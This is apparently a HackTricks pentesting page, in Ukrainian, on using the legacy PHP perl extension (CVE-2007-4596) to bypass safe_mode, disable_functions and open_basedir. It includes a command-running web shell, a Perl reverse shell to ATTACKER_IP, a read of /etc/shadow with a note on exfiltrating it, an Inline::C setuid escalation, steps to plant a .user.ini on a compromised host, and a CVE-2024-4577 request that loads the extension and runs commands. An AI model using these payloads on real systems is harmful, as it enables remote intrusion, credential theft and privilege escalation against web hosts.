PHP Perl Extension Safe_mode Bypass Exploit

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

Передумови

Проблема, позначена як CVE-2007-4596, походить від застарілого PHP-розширення perl, яке вбудовує повний Perl-інтерпретер, не дотримуючись контролів PHP safe_mode, disable_functions або open_basedir. Будь-який PHP-воркер, який завантажує extension=perl.so, отримує необмежений доступ до Perl eval, тому виконання команд залишається тривіальним навіть коли всі класичні PHP-примітиви для запуску процесів заблоковані. Хоча safe_mode зник у PHP 5.4, багато застарілих shared-hosting стеків і вразливих лабораторій і досі його використовують, тому цей обхід все ще корисний, коли ви потрапляєте на спадкові панелі керування.

Сумісність та стан пакування (2025)

  • Останній реліз PECL (perl-1.0.1, 2013) орієнтований на PHP ≥5.0; PHP 8+ як правило не працює через зміни в Zend API.
  • PECL поступово замінюється PIE, але старі стеки і досі постачають PECL/pear. Використовуйте наведений нижче процес для цілей на PHP 5/7; на новіших PHP очікуйте необхідності пониження версії або переходу на інший шлях інжекції (наприклад, userland FFI).

Побудова тестового середовища у 2025 році

  • Отримайте perl-1.0.1 з PECL, скомпілюйте його для гілки PHP, яку плануєте атакувати, і завантажте глобально (php.ini) або через dl() (якщо дозволено).
  • Швидкий рецепт лабораторії на базі Debian:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • Під час експлуатації підтвердіть наявність за допомогою var_dump(extension_loaded('perl')); або print_r(get_loaded_extensions());. Якщо відсутній, пошукайте perl.so або використайте записувані php.ini/.user.ini для примусового завантаження.
  • Оскільки інтерпретер живе всередині PHP-воркера, зовнішні бінарники не потрібні — мережеві фільтри вихідного трафіку або чорні списки proc_open не мають значення.

Ланцюг збірки на хості, коли доступний phpize

Якщо phpize і build-essential присутні на скомпрометованому хості, ви можете скомпілювати і розмістити perl.so, не виконуючи shell-команди ОС:

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

Якщо open_basedir увімкнено, переконайтеся, що скинуті .user.ini та .so знаходяться в дозволеному шляху; директива extension= все ще діє всередині basedir. Потік компіляції відповідає довіднику PHP щодо збірки PECL extensions.

Оригінальний PoC (NetJackal)

З http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, все ще корисно для підтвердження, що розширення відповідає на eval:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Сучасні поліпшення Payload

1. Повний TTY через TCP

Вбудований інтерпретатор може завантажувати IO::Socket, навіть якщо /usr/bin/perl заблоковано:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. Втеча з файлової системи навіть при open_basedir

Perl ігнорує open_basedir у PHP, тому ви можете читати довільні файли:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Пропустіть вивід через IO::Socket::INET або Net::HTTP, щоб exfiltrate дані, не торкаючись дескрипторів, керованих PHP.

3. Inline Compilation для Privilege Escalation

Якщо Inline::C доступний на рівні системи, компілюйте допоміжні модулі всередині запиту, не покладаючись на ffi або pcntl у PHP:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Розглядайте Perl як набір LOLBAS — наприклад, витягніть MySQL DSNs навіть якщо mysqli відсутній:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

2024+ Зловживання: Завантаження perl.so через PHP-CGI Argument Injection (CVE-2024-4577)

На Windows-інсталяціях, які досі публічно доступні через PHP-CGI, регресія інʼєкції аргументів 2024 року (CVE-2024-4577) дозволяє передавати довільні опції -d інтерпретатору. Це означає, що ви можете завантажити Perl-розширення навіть якщо dl() відключено, а php.ini доступний лише для читання:

  • Зберіть або завантажте сумісний perl.dll/perl.so у шлях, доступний для запису вебом (наприклад, C:\xampp\htdocs\temp\perl.dll).
  • Надішліть один HTTP-запит, який інʼєктує -d extension=C:\\xampp\\htdocs\\temp\\perl.dll і в тому ж тілі запиту містить Perl-backed payload:
POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: victim
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

<?php $p=new perl(); $p->eval("system('whoami && hostname')"); ?>

Оскільки PHP worker тепер вбудовує Perl перед тим, як прочитати тіло, всі класичні disable_functions/open_basedir контролі оминаються. Це працює на вразливих Windows/CGI стеках до виправлення (PHP 8.1.29/8.2.20/8.3.8 і пізніші закривають регресію). Якщо open_basedir блокує шлях до DLL, спочатку помістіть файл у дозволений базовий каталог або використайте існуючий загальнодоступний шлях до DLL, що постачається з XAMPP.

Посилання

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks